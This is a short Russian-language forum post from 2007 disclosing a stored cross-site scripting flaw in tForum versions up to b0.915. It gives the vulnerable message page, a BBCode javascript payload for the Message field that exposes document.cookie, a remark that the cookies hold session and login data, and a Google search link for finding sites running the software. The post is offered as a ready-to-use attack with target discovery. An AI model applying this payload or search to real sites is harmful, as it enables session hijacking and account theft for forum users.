17.04.2007, 12:30
|
|
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме:
682079
Репутация:
137
|
|
tForum <= b0.915
Форум малораспространённый, но всё же.
Активная XSS в поле "Message".
Код:
http://www.target/path/message.php
Вставляем в поле "Message":
Код:
[img]javascript:alert(document.cookie)[/img]
В кукисах сессия, логин.
Ссылка для поиска в Google:
Код:
_http://www.google.ru/search?hl=ru&newwindow=1&q=Powered+by%3A+tForum&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=
|
|
|